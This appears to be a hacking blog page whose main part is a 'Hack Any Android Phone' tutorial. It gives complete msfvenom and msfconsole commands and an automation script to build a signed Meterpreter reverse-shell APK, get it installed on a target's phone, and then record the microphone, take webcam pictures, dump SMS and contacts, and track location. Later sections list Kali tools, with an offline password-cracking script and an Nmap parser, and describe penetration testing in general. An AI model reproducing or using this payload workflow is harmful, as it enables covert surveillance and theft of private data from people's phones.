Hack Any Android Phone : msfvenom - Metasploit payload generator

msfvenom is the Metasploit Framework's payload generator. It combines the older Msfpayload and Msfencode tools into a single command that both generates a payload and encodes it, and it ships with Kali Linux. Here it is used to build an Android Meterpreter APK.

msfvenom does not replace Metasploit; it replaced msfpayload and msfencode, which were retired in 2015. You still need the Metasploit Framework itself (msfconsole) to catch the connection the payload makes back.


So, let's get started!!




STEPS :

1. Fire up Kali and open a terminal.

2. Set the payload and generate the APK (an Android package, not a Windows executable).
Command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(To find your LHOST, open a new terminal and run ifconfig or ip -4 addr. LHOST must be an address the phone can reach: the Kali box's LAN address if both are on the same network, otherwise a public address or a port forward that lands on the Kali box.)

The APK is saved in the directory the command was run from (the home folder if you just opened the terminal). The "R >" redirection is legacy msfpayload-style syntax (R = raw output to stdout); the current msfvenom idiom is -o andro.apk. Current msfvenom also signs the APK itself with a generated certificate when the Java keytool/jarsigner tools are installed, which makes the signing fix at the end of this page unnecessary on recent builds.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing LHOST and LPORT as needed).

3. Transfer the file (here andro.apk) to the target phone, by USB, e-mail or a download link, and install it. Android only installs APKs from outside the Play Store if installation from unknown sources is allowed (Settings > Security on old versions; a per-app "Install unknown apps" permission from Android 8 on), and it refuses unsigned APKs, which is the usual cause of the "parse error" covered at the end of this page.

4. Start the Metasploit Framework console as follows:
      
Command:
 msfconsole

5. Now set up multi/handler, which listens for the phone's connection. Follow these steps:
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        The handler starts and reports that it is listening on 192.168.0.110:4444. The payload, LHOST and LPORT here must be exactly the ones used when the APK was generated; if they differ, the phone connects to the wrong place and no session ever appears.

6. When the target opens the app (it shows up as "MainActivity" in the app drawer), the payload connects back to the handler and a meterpreter session is opened. On first launch the app also asks for its runtime permissions (camera, microphone, contacts, SMS, location); on Android 6 and later the commands below only work for permissions that were granted.

7. Try the following Meterpreter commands in the session:
    - sysinfo
    - check_root
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
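The whole procedure above wrapped into one script, as an added example that is not part of the original tutorial. The LHOST/LPORT values and the file names andro.apk and handler.rc are assumptions. The script writes a Metasploit resource file so the handler is started non-interactively with the same values that were baked into the APK, which removes the most common failure (handler and payload disagreeing on LHOST/LPORT).

```shell
#!/bin/sh
# Added example (not from the original page): build the Android payload
# and a matching multi/handler resource script in one go.
# Assumptions: LHOST/LPORT below, output names andro.apk and handler.rc.

PAYLOAD=android/meterpreter/reverse_tcp

# Print a msfconsole resource script that sets up multi/handler for
# exactly the payload/LHOST/LPORT used to build the APK.
# Run it with: msfconsole -q -r handler.rc
make_handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    printf 'set ExitOnSession false\n'   # keep listening after the first session
    printf 'exploit -j -z\n'             # run the handler as a background job
}

# Generate the APK. -o replaces the legacy "R > file" redirection; current
# msfvenom also signs the APK with a generated certificate, so no
# separate signing step is normally needed.
build_apk() {
    msfvenom -p "$1" LHOST="$2" LPORT="$3" -o "$4"
}

# Sanity check before sending the APK to a device: the handler values in
# the .rc file must be the ones the APK was built with.
rc_matches() {
    grep -qx "set LHOST $2" "$1" && grep -qx "set LPORT $3" "$1"
}

if command -v msfvenom >/dev/null 2>&1; then
    LHOST=${LHOST:-192.168.0.110}   # assumption: the Kali box's LAN address (ip -4 addr)
    LPORT=${LPORT:-4444}
    build_apk "$PAYLOAD" "$LHOST" "$LPORT" andro.apk
    make_handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > handler.rc
    rc_matches handler.rc "$LHOST" "$LPORT" && echo "handler.rc matches andro.apk; run: msfconsole -q -r handler.rc"
else
    echo "msfvenom not found: install the Metasploit Framework first" >&2
fi
```

With ExitOnSession false and exploit -j -z the handler keeps running in the background, so several phones can connect to the same listener and you keep the msfconsole prompt; use sessions -l and sessions -i N to pick one.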
************************************************************************
Error fixing (in case the phone shows "There is a problem parsing the package")

That installer message usually means the APK is unsigned (or was built for a newer Android API level than the phone runs). Android refuses to install unsigned packages, so the APK must be signed. Two methods:

1) dex2jar's signer, which signs with its bundled test certificate:
   d2j-apk-sign andro.apk

                                               or

2) Google's signapk tool (signapk.jar together with a certificate and its matching private key):

Steps to follow
  1. Open the signapk folder and open a command prompt there.
  2. Copy andro.apk (the app you made) into the signapk folder.
  3. Run: java -jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk
  4. Copy andro-signed.apk to the phone and install it.

Both tools produce a v1 (JAR) signature. Android 11 and later reject v1-only signatures only for apps that target API level 30 or higher, so this is fine for the msfvenom payload. If you have the Android SDK build-tools installed, apksigner is the current way to sign and to check the result:
   apksigner sign --ks my.keystore --out andro-signed.apk andro.apk
   apksigner verify --verbose andro-signed.apk
Hope this works... :)



Top Kali Linux Tools Every Hacker Should Know About and Learn



Hello friends, how are you doing? I hope everything is fine and you are enjoying your hacking. I thought I would add a little more to your skills with "Top Kali Linux Tools Every Hacker Should Know About and Learn": these are the tools hackers and penetration testers reach for most in their day-to-day work.

Most hacking tools come pre-installed in Kali Linux, which is maintained by the Offensive Security team. There are over 300 tools included; this site covers them, and we will be writing full, detailed articles about most of the tools that ship with Kali Linux 2.0.

Becoming an ethical hacker is not as easy as becoming a software developer, as you will quickly realize once you start learning. To pull off even a simple hack on your own, a hacker needs a good understanding of several topics. Many people say you should have in-depth knowledge of programming languages like C++, Python and HTML, plus advanced Linux/Unix and networking knowledge, to get started in this field.
But even that is not enough: however good you are, there will always be things you don't know. Software and its security evolve every day, so as a hacker you must keep learning new things at a fast pace.

What is new in Kali Linux 2.0?

If you are into network penetration testing and hacking, Kali Linux is the best Linux distro out there, with all the tools pre-installed and ready to use. That saves a lot of setup time and lets you get straight to owning the network.

Top Kali Linux Tools:-

Now let's get started with the list of my favorite tools, which are a lot of other hackers' favorites too.

1. Metasploit:-

Metasploit is a framework for developing and running exploits, shellcode, payloads and fuzzing tools, and it bundles a very large collection of exploits and exploitation tools into a single framework. It runs on all major operating systems (Windows, OS X and Linux) and comes pre-installed in Kali Linux. It is an offensive tool, used to attack your own or your company's infrastructure to find security holes and fix them before a real attacker breaks in.
It can also be used to target web applications, networks and servers. You get both a command line interface (msfconsole) and GUIs (Armitage, below, or the Pro web interface). There are two editions: the free, open-source Metasploit Framework and the paid Metasploit Pro.

2. Nmap (Network Mapper):-

Nmap scans whole networks for live hosts and open ports, maps networks and much more. It is mainly used for discovering which machines are online and for security auditing. Most network admins use Nmap to find online computers, open ports and the services running on them. It crafts raw IP packets in creative ways to learn which hosts are available, which ports are open, and which services (application name and version) are running on those ports, and it can also guess the operating system.
It comes in both GUI and command line versions; Zenmap is the GUI. My recommendation is to learn the command line first and move to the GUI once you feel confident.
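An added example, not from the original page, showing what Nmap's greppable output (-oG) looks like and how to turn it into a host/port/service list you can feed to other tools. The scan results below are constructed sample data, not a real scan; the command that would produce them is given in the comments.

```shell
#!/bin/sh
# Added example (not from the original page). Parse Nmap greppable
# output (-oG) into "host port/proto service version" lines for open ports.
# A real scan producing this format:  nmap -sV -oG scan.gnmap 192.168.0.0/24

# Constructed sample of the -oG format (tab-separated fields). Each port
# entry is port/state/protocol/owner/service/rpcinfo/version/
sample_gnmap() {
    printf '# Nmap 7.94 scan initiated as: nmap -sV -oG scan.gnmap 192.168.0.0/24\n'
    printf 'Host: 192.168.0.1 ()\tStatus: Up\n'
    printf 'Host: 192.168.0.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 192.168.0.10 ()\tStatus: Up\n'
    printf 'Host: 192.168.0.10 ()\tPorts: 445/open/tcp//microsoft-ds//Samba smbd 4/\tIgnored State: closed (999)\n'
    printf '# Nmap done -- 256 IP addresses (2 hosts up) scanned\n'
}

# Read -oG text on stdin, print one line per OPEN port.
parse_gnmap() {
    awk -F'\t' '
    /Ports:/ {
        split($1, h, " "); host = h[2]           # "Host: 192.168.0.1 ()" -> address
        for (i = 2; i <= NF; i++) {
            if ($i !~ /^Ports: /) continue
            sub(/^Ports: /, "", $i)
            n = split($i, entries, /, /)         # entries are comma+space separated
            for (j = 1; j <= n; j++) {
                split(entries[j], f, "/")        # f[1]=port f[2]=state f[3]=proto f[5]=service f[7]=version
                if (f[2] == "open")
                    printf "%s %s/%s %s %s\n", host, f[1], f[3], f[5], f[7]
            }
        }
    }'
}

# Count hosts with at least one open port (quick summary for a report).
count_hosts_with_open_ports() {
    parse_gnmap | cut -d' ' -f1 | sort -u | grep -c .
}

sample_gnmap | parse_gnmap
```

Only ports whose state is "open" are kept; the closed 443/tcp on the first host is dropped. The same one-line-per-service output is what you would pass on to Nikto, Hydra or a Metasploit scanner module for the next stage.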

3. Armitage:-

Armitage is a graphical cyber attack management tool: it provides a GUI for Metasploit's features and makes them easier to understand and use. If you want to grow into Metasploit's advanced features, Armitage is a good place to start.
Armitage organizes Metasploit's capabilities around the hacking process, with features for discovery, access, post-exploitation and maneuver.
If you are working in a team, it helps share information with your team mates through a shared Metasploit instance (team server):
  • Use the same sessions
  • Share compromised hosts, captured data, downloaded files etc.
  • Communicate using a shared event log.
  • Run bots to automate tasks.

4. John The Ripper (JTR):-

John the Ripper is a very popular password cracking tool, also known as JTR, and it has the coolest name of all the tools. Mostly it is simply referred to as 'John'. It is the most commonly used tool for offline password cracking and dictionary attacks. John takes a text file, referred to as a 'wordlist', containing commonly used passwords or real passwords cracked before, hashes each candidate with the same algorithm (and salt, if there is one) that produced the hash being attacked, and compares the result with the target hash; a match reveals the password. Password hashes are one-way, so nothing is decrypted: cracking is guessing, and a wordlist just makes the guesses good ones.
The tool can perform different kinds of dictionary and brute-force attacks (wordlist rules, incremental mode). If you are confused between John the Ripper and THC Hydra, the simplest way to explain it is that THC Hydra cracks passwords against online services (it sends real login attempts over the network) while John cracks password hashes offline.
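The hash-and-compare loop described above, as an added shell example that is not John the Ripper's code: it hashes each wordlist candidate with SHA-256 and stops at the first match. The five-entry wordlist is constructed. John does the same thing far faster and for hundreds of hash formats (for this one: john --format=raw-sha256 --wordlist=words.txt hashes.txt); salted or slow hashes such as bcrypt change only the per-guess cost, not the principle.

```shell
#!/bin/sh
# Added example (not John the Ripper's code): the offline dictionary-attack
# loop in its simplest form. Hash function and wordlist are assumptions.

# SHA-256 of a string (no trailing newline), GNU or BSD userland.
sha256_hex() {
    if command -v sha256sum >/dev/null 2>&1; then
        printf '%s' "$1" | sha256sum | cut -d' ' -f1
    else
        printf '%s' "$1" | shasum -a 256 | cut -d' ' -f1
    fi
}

# Constructed sample wordlist (real attacks use lists like rockyou.txt).
make_wordlist() {
    printf '%s\n' 123456 password qwerty letmein dragon > "$1"
}

# Offline dictionary attack: hash every candidate exactly the way the
# target hash was produced and compare. Prints the recovered password and
# returns 0 on a hit, returns 1 when the wordlist is exhausted.
crack_sha256() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # normalise hex case
    wordlist=$2
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(sha256_hex "$candidate")" = "$target" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Demo: recover a password from its hash using the sample list.
list=$(mktemp)
make_wordlist "$list"
hash=$(sha256_hex letmein)         # stands in for a hash dumped from a target
if pw=$(crack_sha256 "$hash" "$list"); then
    echo "cracked: $hash -> $pw"
else
    echo "not in wordlist: $hash"
fi
rm -f "$list"
```

Note that the attacker never talks to the target system during this loop, which is why offline cracking is silent and unlimited in speed, unlike Hydra's online guessing, where every attempt is a log line and may trigger a lockout.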

5. Wireshark:-

Wireshark is an open source tool for network analysis and profiling of network traffic and packets; tools of this kind are referred to as network sniffers.
Wireshark, previously known as Ethereal, monitors network traffic and analyzes the packets that are sent and received. It captures traffic ranging from connection-level information down to the individual bits that make up a single packet. All of this is done in real time and shown to the user in a readable format. The tool has seen a lot of development over the years and includes display filters and color-coding of packets based on their contents, features that really help penetration testers dig deeper into network traffic and inspect packets in detail.
Note: If you are serious about network administration or penetration testing, knowing how to use Wireshark is a required skill. There are a lot of resources available online for learning Wireshark in depth.

6. THC Hydra:-

THC Hydra is another password cracking tool, and John the Ripper and Hydra are mostly used hand in hand. THC Hydra, also known as Hydra, is a really popular tool for cracking network logins: it runs brute force and dictionary attacks against the login service itself. It supports a wide range of protocols, including SSH, mail (POP3, IMAP etc.), databases, SMB, VNC, LDAP, HTTP forms and many more. Because every guess is a real login attempt over the network, it is noisy and slow compared with John, and it can trigger account lockouts.

7. Burp Suite:-

Burp Suite is the web application penetration tester's dream tool; it covers intercepting, modifying, replaying and fuzzing HTTP traffic in one package, and there is a lot to cover. Here is a quick list of Burp Suite components:
  • Intercepting Proxy – lets you inspect and modify every request and response between your browser and the target application.
  • Spider – crawls the target to enumerate its directories, files and functionality.
  • Scanner* – the automated vulnerability scanner, which detects vulnerabilities in the site.
  • Intruder – builds and runs customized attacks (fuzzing parameters, brute-forcing logins, enumerating IDs) to find and exploit unexpected behaviour.
  • Repeater – modifies and re-sends individual requests by hand.
  • Sequencer – tests the randomness of tokens (CSRF tokens, session IDs, authenticity_token etc.).
  • Extender – lets you write your own plugins or install pre-made ones from the BApp Store to perform complex, fully customized attacks.
* Denotes a feature only available in the Professional edition.

8. OWASP Zed:-

OWASP Zed Attack Proxy (ZAP) is another well known intercepting proxy and a good alternative to Burp Suite; the nice thing is that it is free and open source. If you have read everything above, you already know a little about this stuff and may be familiar with OWASP.
If you don't know what OWASP is, in short: OWASP is a free and open software security community.
And if you are getting into web penetration testing, you must read the OWASP Top 10, the 'guide-book' of web application security.
ZAP does the job pretty well and is an easy-to-use program for finding vulnerabilities in web applications. What makes ZAP good to use is its strong support from the OWASP security community. You can point it at a target and run an automated scan to find vulnerabilities, and you can also do manual testing, pro style.

9. Social Engineering Toolkit:-

The Social-Engineer Toolkit, popularly known as SET, is a really handy tool in that its attacks target the human element instead of the system. It has really useful features that let you send phishing e-mails to targets, clone websites to harvest credentials, create backdoored Java applets and more. It is a command line tool and works on Linux, Mac OS X and Windows.

10. Aircrack-ng:-

Another password cracking tool, this time for Wi-Fi. Tools of this kind are really effective in the right hands. For those new to wireless-specific hacking, Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking tool that recovers keys once enough packets have been captured with the wireless card in monitor mode. For anyone tasked with penetrating and auditing wireless networks, Aircrack-ng will become your best friend.
If you are getting into Wi-Fi hacking, even a beginner can crack a WEP key in a few minutes, because WEP is broken by design. WPA/WPA2-PSK takes much more work: you must capture a client's four-way handshake and then run a dictionary attack against it, so the result depends entirely on the strength of the passphrase.
If you are interested in wireless hacking, also check out Reaver, another popular Wi-Fi utility, which attacks WPS PINs rather than the passphrase.

11. BeEF:-

BeEF stands for The Browser Exploitation Framework and is a penetration testing tool focused on the web browser. It takes advantage of vulnerabilities in the web application the victim is using, mainly cross-site scripting, to load its JavaScript hook into the victim's browser; once the hook is running, the attacker controls that browser from BeEF's console (fingerprinting it, running further modules, pivoting to the internal network) for as long as the hooked page stays open.

12. Maltego:-

Maltego gathers all the information available about a target on the internet, such as e-mail addresses, DNS records and much more, and shows the relationships between them as a graph. It can be used to gather information about individuals or networks and belongs in the reconnaissance/OSINT category.

13. Ettercap:-

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN (ARP poisoning, DNS spoofing, sniffing of live connections). It can be used for network protocol analysis and security auditing. It is available for Windows, Unix, Linux, BSD and other platforms.

14. Nikto Website Vulnerability Scanner:-

Nikto is an open source vulnerability scanner used to test web servers for many different issues. It checks against a database of over 6800 potentially dangerous files and programs, checks for outdated (unpatched) versions of over 1300 servers, looks for bad configuration practices such as multiple index files and risky HTTP server options, and identifies which web server software is installed. It is not stealthy: it generates a lot of requests and shows up clearly in server logs.

Final Words:-

These are not the only tools that are useful for penetration testing; many others can be used for the same jobs, and combining tools often gets better results.

PENETRATION TESTING



WHAT IS PENETRATION TESTING

A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall (WAF).
Pen testing can involve the attempted breaching of any number of application systems (e.g., application programming interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as unsanitized inputs that are susceptible to code injection attacks.
Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.

PENETRATION TESTING STAGES

The pen testing process can be broken down into five stages.
  1. Planning and reconnaissance
     The first stage involves:
     • Defining the scope and goals of a test, including the systems to be addressed and the testing methods to be used.
     • Gathering intelligence (e.g., network and domain names, mail server) to better understand how a target works and its potential vulnerabilities.
  2. Scanning
     The next step is to understand how the target application will respond to various intrusion attempts. This is typically done using:
     • Static analysis – Inspecting an application's code to estimate the way it behaves while running. These tools can scan the entirety of the code in a single pass.
     • Dynamic analysis – Inspecting an application's code in a running state. This is a more practical way of scanning, as it provides a real-time view into an application's performance.
  3. Gaining access
     This stage uses web application attacks, such as cross-site scripting, SQL injection and backdoors, to uncover a target's vulnerabilities. Testers then try to exploit these vulnerabilities, typically by escalating privileges, stealing data, intercepting traffic, etc., to understand the damage they can cause.
  4. Maintaining access
     The goal of this stage is to see if the vulnerability can be used to achieve a persistent presence in the exploited system, long enough for a bad actor to gain in-depth access. The idea is to imitate advanced persistent threats, which often remain in a system for months in order to steal an organization's most sensitive data.
  5. Analysis
     The results of the penetration test are then compiled into a report detailing:
     • Specific vulnerabilities that were exploited
     • Sensitive data that was accessed
     • The amount of time the pen tester was able to remain in the system undetected
     This information is analyzed by security personnel to help configure an enterprise's WAF settings and other application security solutions to patch vulnerabilities and protect against future attacks.

PENETRATION TESTING METHODS

EXTERNAL TESTING

External penetration tests target the assets of a company that are visible on the internet, e.g., the web application itself, the company website, and email and domain name servers (DNS). The goal is to gain access and extract valuable data.

INTERNAL TESTING

In an internal test, a tester with access to an application behind its firewall simulates an attack by a malicious insider. This isn't necessarily simulating a rogue employee. A common starting scenario can be an employee whose credentials were stolen due to a phishing attack.

BLIND TESTING

In a blind test, a tester is only given the name of the enterprise that's being targeted. This gives security personnel a real-time look into how an actual application assault would take place.

DOUBLE BLIND TESTING

In a double blind test, security personnel have no prior knowledge of the simulated attack. As in the real world, they won't have any time to shore up their defenses before an attempted breach.

TARGETED TESTING

In this scenario, both the tester and security personnel work together and keep each other apprised of their movements. This is a valuable training exercise that provides a security team with real-time feedback from a hacker's point of view.

PENETRATION TESTING AND WEB APPLICATION FIREWALLS

Penetration testing and WAFs are separate, yet mutually beneficial security measures.
For many kinds of pen testing (with the exception of blind and double blind tests), the tester is likely to use WAF data, such as logs, to locate and exploit an application's weak spots.
In turn, WAF administrators can benefit from pen testing data. After a test is completed, WAF configurations can be updated to secure against the weak spots discovered in the test.
Finally, pen testing satisfies some of the compliance requirements for security auditing procedures, including PCI DSS and SOC 2. Some requirements, such as PCI DSS 6.6, can be met either by regularly assessing public-facing web applications for vulnerabilities or by putting a WAF in front of them; choosing the WAF option does not make pen testing any less useful, given its benefits above and its ability to improve WAF configurations.
Copyright © 2013 Anonymous Hacker